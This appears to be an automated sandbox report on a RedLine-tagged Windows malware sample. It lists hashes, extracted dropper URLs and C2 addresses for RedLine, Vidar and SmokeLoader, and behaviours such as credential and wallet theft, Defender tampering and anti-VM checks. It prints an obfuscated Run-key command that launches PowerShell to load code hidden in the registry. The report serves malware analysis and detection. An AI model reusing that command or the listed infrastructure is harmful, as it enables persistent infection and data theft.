redline | 6a91a4affa1ec1e4e06492a200ed0365f21a2576f065852944fd7fb362ed1370

Analysis

max time kernel
151s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
10-03-2022 03:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6a91a4affa1ec1e4e06492a200ed0365f21a2576f065852944fd7fb362ed1370.exe
Size

4.9MB
MD5

08ca0e52948460c5c2f82791a1ddb2fc
SHA1

3bf63775ab40e1848184934f358bd9f23883cea1
SHA256

6a91a4affa1ec1e4e06492a200ed0365f21a2576f065852944fd7fb362ed1370
SHA512

065de1d0b1113571406fe23c72b000c9a09f24e2a301438bfc7a1e9188f9d621cd02f8e060b6ad0ef808f0541e5ae9743b89f704f0e29c9caaca58e489d90898

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NAN.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NON.oo

Extracted

Family

redline

Botnet

ServAni

87.251.71.195:82

Extracted

Family

vidar

Version

39.4

Botnet

706

https://sergeevih43.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

fdfsdf

86.107.197.196:63065

Attributes

auth_value
49c341b88f13528ba52befa3c6ca7ebb

Extracted

Family

redline

Botnet

jack

5.182.5.203:33873

Attributes

auth_value
6d03d90d7d897b871fe8bfcaec8c6ae0

Extracted

Family

redline

Botnet

Travis

5.182.5.22:33809

Attributes

auth_value
6fa3251b9d70327e7d1e5851c226af23

Extracted

Family

redline

Botnet

ruzki (check bio)

103.133.111.182:44839

Attributes

auth_value
767fa45398d3ac4a23de20d0480c2b03

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/372-207-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/4976-240-0x0000000000890000-0x00000000008B0000-memory.dmp	family_redline
behavioral2/memory/1832-246-0x00000000005D0000-0x00000000007F1000-memory.dmp	family_redline
behavioral2/memory/4440-256-0x0000000000380000-0x00000000005A3000-memory.dmp	family_redline
behavioral2/memory/4440-254-0x0000000000380000-0x00000000005A3000-memory.dmp	family_redline
behavioral2/memory/4440-241-0x0000000000380000-0x00000000005A3000-memory.dmp	family_redline
behavioral2/memory/1832-264-0x00000000005D0000-0x00000000007F1000-memory.dmp	family_redline
behavioral2/memory/1832-261-0x00000000005D0000-0x00000000007F1000-memory.dmp	family_redline
behavioral2/memory/4440-279-0x0000000000380000-0x00000000005A3000-memory.dmp	family_redline
behavioral2/memory/3524-299-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/4720-233-0x0000000000400000-0x0000000000949000-memory.dmp	family_vidar
behavioral2/memory/4720-236-0x00000000025B0000-0x000000000264D000-memory.dmp	family_vidar

ASPack v2.12-2.42 8 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\libcurl.dll	aspack_v212_v242

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

247 4488 powershell.exe
248 2556 powershell.exe
249 3472 powershell.exe
259 2556 powershell.exe
248 2556 powershell.exe
Downloads MZ/PE file

flow	pid	process
247	4488	powershell.exe
248	2556	powershell.exe
249	3472	powershell.exe
259	2556	powershell.exe
248	2556	powershell.exe

Executes dropped EXE 42 IoCs

Processes:

setup_installer.exesetup_install.exesotema_5.exesotema_7.exesotema_8.exesotema_4.exesotema_2.exesotema_1.exesotema_6.exesotema_3.exesotema_7.tmpjhuuee.exeliuchao.exejfiag3g_gg.exeUGloryStp.exejfiag3g_gg.exesotema_6.exejfiag3g_gg.exejfiag3g_gg.exeY48EJj8dufnT9we1tGVqxudn.exeU0r5QuazQiYk1kJU4whb_HUC.exeWBwISM7PVKCw6WhgJPk4TUhF.exeAPx1dX8mWpxezQIu5RiCWSJj.exetimeout.exetUnZNlDgqXmEiT0buT3X_rM3.exeNb7sZIm71uAW16aY7TMFXxad.exeoNFOqOjn97py2MlKDeCY1hkF.exeI95UVzzQH_Np1zTF5NCrVUeL.exe6210_9LtpvYIKaRI_Oc3U5iQ.exeeQd4dlwDLkbVg8ng6skbdIjt.exeC96RKHtKpplUJ6ExsB7XDFxn.exefind.exeLpk1DHbkoHvMbmjlG6Ehcuk8.exeYRBJOgxXy9BTErub9Ay5ESqt.exeCRKwonPHVFzqeBlClm1Iu73t.exevELNqMqAVRBnkgbGcAWIYzv4.exeInstall.exeoNFOqOjn97py2MlKDeCY1hkF.exeInstall.exeAccostarmi.exe.pifAccostarmi.exe.pifbmtukMK.exe

pid	process
2668	setup_installer.exe
4848	setup_install.exe
932	sotema_5.exe
1212	sotema_7.exe
1268	sotema_8.exe
1376	sotema_4.exe
4736	sotema_2.exe
1416	sotema_1.exe
2428	sotema_6.exe
4720	sotema_3.exe
3172	sotema_7.tmp
3484	jhuuee.exe
4480	liuchao.exe
4484	jfiag3g_gg.exe
2292	UGloryStp.exe
3688	jfiag3g_gg.exe
372	sotema_6.exe
1300	jfiag3g_gg.exe
1352	jfiag3g_gg.exe
4440	Y48EJj8dufnT9we1tGVqxudn.exe
2768	U0r5QuazQiYk1kJU4whb_HUC.exe
3416	WBwISM7PVKCw6WhgJPk4TUhF.exe
4976	APx1dX8mWpxezQIu5RiCWSJj.exe
648	timeout.exe
4388	tUnZNlDgqXmEiT0buT3X_rM3.exe
1832	Nb7sZIm71uAW16aY7TMFXxad.exe
1904	oNFOqOjn97py2MlKDeCY1hkF.exe
1968	I95UVzzQH_Np1zTF5NCrVUeL.exe
1324	6210_9LtpvYIKaRI_Oc3U5iQ.exe
2280	eQd4dlwDLkbVg8ng6skbdIjt.exe
3712	C96RKHtKpplUJ6ExsB7XDFxn.exe
4760	find.exe
2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
4880	YRBJOgxXy9BTErub9Ay5ESqt.exe
3388	CRKwonPHVFzqeBlClm1Iu73t.exe
3648	vELNqMqAVRBnkgbGcAWIYzv4.exe
1160	Install.exe
3524	oNFOqOjn97py2MlKDeCY1hkF.exe
2332	Install.exe
3864	Accostarmi.exe.pif
4380	Accostarmi.exe.pif
2084	bmtukMK.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

CRKwonPHVFzqeBlClm1Iu73t.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	CRKwonPHVFzqeBlClm1Iu73t.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	CRKwonPHVFzqeBlClm1Iu73t.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sotema_5.exeU0r5QuazQiYk1kJU4whb_HUC.exeeQd4dlwDLkbVg8ng6skbdIjt.exeInstall.exesetup_installer.exesotema_8.exesotema_1.exeliuchao.exe6210_9LtpvYIKaRI_Oc3U5iQ.exe6a91a4affa1ec1e4e06492a200ed0365f21a2576f065852944fd7fb362ed1370.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	sotema_5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	U0r5QuazQiYk1kJU4whb_HUC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	eQd4dlwDLkbVg8ng6skbdIjt.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	sotema_8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	sotema_1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	liuchao.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	6210_9LtpvYIKaRI_Oc3U5iQ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	6a91a4affa1ec1e4e06492a200ed0365f21a2576f065852944fd7fb362ed1370.exe

Loads dropped DLL 18 IoCs

Processes:

setup_install.exesotema_7.tmprUNdlL32.eXerUNdlL32.eXesotema_2.exefind.exeAccostarmi.exe.pif

pid	process
4848	setup_install.exe
4848	setup_install.exe
4848	setup_install.exe
4848	setup_install.exe
4848	setup_install.exe
4848	setup_install.exe
3172	sotema_7.tmp
3712	rUNdlL32.eXe
5088	rUNdlL32.eXe
4736	sotema_2.exe
4760	find.exe
4760	find.exe
3864	Accostarmi.exe.pif
3864	Accostarmi.exe.pif
3864	Accostarmi.exe.pif
3864	Accostarmi.exe.pif
3864	Accostarmi.exe.pif
3864	Accostarmi.exe.pif

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/3388-276-0x00007FF7E47A0000-0x00007FF7E4D4E000-memory.dmp	themida
behavioral2/memory/3388-272-0x00007FF7E47A0000-0x00007FF7E4D4E000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

vELNqMqAVRBnkgbGcAWIYzv4.exejhuuee.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Eyxrppteq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mzpexsf\\Eyxrppteq.exe\""	vELNqMqAVRBnkgbGcAWIYzv4.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	jhuuee.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FaxOptions = "mshta vbscript:(CreateObject(\"WS\"+\"C\"+\"rI\"+\"Pt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\Microsoft\\Fax').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

CRKwonPHVFzqeBlClm1Iu73t.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	CRKwonPHVFzqeBlClm1Iu73t.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 ip-api.com
111 ipinfo.io
112 ipinfo.io
258 ipinfo.io

flow	ioc
16	ip-api.com
111	ipinfo.io
112	ipinfo.io
258	ipinfo.io

Drops file in System32 directory 6 IoCs

Processes:

Install.exepowershell.exepowershell.exebmtukMK.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	bmtukMK.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	bmtukMK.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Y48EJj8dufnT9we1tGVqxudn.exeNb7sZIm71uAW16aY7TMFXxad.exe

pid process

4440 Y48EJj8dufnT9we1tGVqxudn.exe
1832 Nb7sZIm71uAW16aY7TMFXxad.exe

pid	process
4440	Y48EJj8dufnT9we1tGVqxudn.exe
1832	Nb7sZIm71uAW16aY7TMFXxad.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

sotema_6.exeoNFOqOjn97py2MlKDeCY1hkF.exepowershell.exepowershell.exevELNqMqAVRBnkgbGcAWIYzv4.exeAccostarmi.exe.pif

description	pid	process	target process
PID 2428 set thread context of 372	2428	sotema_6.exe	sotema_6.exe
PID 1904 set thread context of 3524	1904	oNFOqOjn97py2MlKDeCY1hkF.exe	oNFOqOjn97py2MlKDeCY1hkF.exe
PID 4488 set thread context of 3692	4488	powershell.exe	RegAsm.exe
PID 3472 set thread context of 4300	3472	powershell.exe	RegSvcs.exe
PID 3648 set thread context of 4104	3648	vELNqMqAVRBnkgbGcAWIYzv4.exe	MSBuild.exe
PID 3864 set thread context of 4380	3864	Accostarmi.exe.pif	Accostarmi.exe.pif

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1240	3712	WerFault.exe	rUNdlL32.eXe
1324	5088	WerFault.exe	rUNdlL32.eXe
4788	4720	WerFault.exe	sotema_3.exe
3404	648	WerFault.exe	by3DZtmgoKOmTDuD4jfzk6Bt.exe
4556	3416	WerFault.exe	WBwISM7PVKCw6WhgJPk4TUhF.exe
4076	4388	WerFault.exe	tUnZNlDgqXmEiT0buT3X_rM3.exe
4300	1324	WerFault.exe	6210_9LtpvYIKaRI_Oc3U5iQ.exe
5060	3416	WerFault.exe	WBwISM7PVKCw6WhgJPk4TUhF.exe
544	648	WerFault.exe	by3DZtmgoKOmTDuD4jfzk6Bt.exe
3404	4388	WerFault.exe	tUnZNlDgqXmEiT0buT3X_rM3.exe
4300	1324	WerFault.exe	6210_9LtpvYIKaRI_Oc3U5iQ.exe
4024	1324	WerFault.exe	6210_9LtpvYIKaRI_Oc3U5iQ.exe
624	1324	WerFault.exe	6210_9LtpvYIKaRI_Oc3U5iQ.exe
3520	1324	WerFault.exe	6210_9LtpvYIKaRI_Oc3U5iQ.exe
112	1324	WerFault.exe	6210_9LtpvYIKaRI_Oc3U5iQ.exe
680	1324	WerFault.exe	6210_9LtpvYIKaRI_Oc3U5iQ.exe
2408	1324	WerFault.exe	6210_9LtpvYIKaRI_Oc3U5iQ.exe
3740	4300	WerFault.exe	RegSvcs.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

sotema_2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sotema_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sotema_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sotema_2.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

find.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	find.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	find.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

680 schtasks.exe
544 schtasks.exe
1312 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

648 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4712 tasklist.exe
3416 tasklist.exe

pid	process
680	schtasks.exe
544	schtasks.exe
1312	schtasks.exe

pid	process
648	timeout.exe

pid	process
4712	tasklist.exe
3416	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

2860 taskkill.exe
2860 taskkill.exe
1756 taskkill.exe

pid	process
2860	taskkill.exe
2860	taskkill.exe
1756	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe

Modifies registry class 2 IoCs

Processes:

sotema_1.exeliuchao.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	sotema_1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	liuchao.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

sotema_3.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	sotema_3.exe
